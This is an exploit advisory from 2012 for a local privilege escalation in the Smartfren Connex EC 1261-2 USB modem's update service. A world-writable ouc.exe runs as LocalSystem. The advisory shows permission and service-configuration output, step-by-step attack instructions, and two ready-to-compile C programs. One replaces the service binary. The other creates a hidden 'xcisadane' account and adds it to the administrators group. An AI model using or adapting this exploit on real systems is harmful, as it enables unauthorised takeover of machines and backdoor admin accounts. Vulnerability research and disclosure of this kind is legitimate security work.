======== Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability ======== :--------------: : # Exploit Title : Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability : # Date : 26 September 2012 : # Author : X-Cisadane : # Software Link : http://www.smartfren.com/data/ec1261.html : # File Version : 21.005.15.03.836 : # Category : Desktop (Windows) Applications : # Platform : Win32 & Win64 : # Vulnerability : Local Privilege Escalation Vulnerability : # Tested On : Microsoft Windows 7 Ultimate 64 Bit (EN) : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabarcyber, Winda utari :-------------: Summary ======== Smartfren Connex EC 1261-2 UI OUC is part of Smartfren Connex EC USB EVDO Modem files. Smartfren Connex EC 1261-2 UI OUC is a daemon for updating the USB EVDO Modem files of Smartfren Connex. Description =========== Improper file permissions on executable file of the application could result on Local Privilege Escalation Vulnerability. It can be used by a simple user that can change the executable file with a binary of choice. The binary (ouc.exe) is set by default to Startup and will be executed with SYSTEM privileges. Tested on : Microsoft Windows 7 Ultimate 64 Bit (EN). Proof of Concept ================ C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>>cacls ouc.exe C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe Everyone:F BUILTIN\Users:F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>sc qc "Smartfren Connex EC1261-2 UI. RunOuc" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Smartfren Connex EC1261-2 UI. RunOuc TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Smartfren Connex EC1261-2 UI. OUC DEPENDENCIES : SERVICE_START_NAME : LocalSystem ---------------------------------------------------------------------------------------------- The following attack scenario could be used : 1. An attacker (unprivileged user) rename Smartfren Connex EC1261-2 UI. OUC program file. For example, the Smartfren Connex EC1261-2 UI. OUC program file could be : For Win32 ---> X:\Program Files\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager) For Win64 ---> X:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager) Rename the file to ouc.exe.old 2. An attacker copies his malicious executable file (with same name as the old filename of the FILE - ouc.exe) in the same location. 3. Restart the system. After restart attackers malicious file will be executed with SYSTEM privileges. You can also do it with these simple program : ------------------------------------- [ CUT HERE ] ------------------------------------------- Compile these script below with Dev-C++ Save in the C:\sploit.cpp #include <stdio.h> #include <windows.h> #define DEFAULT_TARGET "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe" #define DEFAULT_BACKUP "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe.old" #define DEFAULT_EXECUTE "C:\\bin.exe" int main(int argc, char *argv[]) { MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP); CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE); return 0; } Compile these script below with Dev-C++ Save in the C:\bin.cpp #include <stdio.h> #include <windows.h> #define CMD "C:\\WINDOWS\\system32\\cmd.exe" #define ONE "/C net user xcisadane xcisadane /add" #define TWO "/C net localgroup administrators xcisadane /add" int main(int argc, char *argv[]) { STARTUPINFO si = {sizeof(STARTUPINFO)}; PROCESS_INFORMATION pi; CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi); CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi); return 0; } ------------------------------------- [ CUT HERE ] ------------------------------------------- Execute file sploit.exe that located in C:\ Reboot your Windows. After reboot, let's check Net User from Command Prompt, if there an user with name xcisadane, so you have successfully! P.S : For Win32 please change Program Files (x86) to Program Files.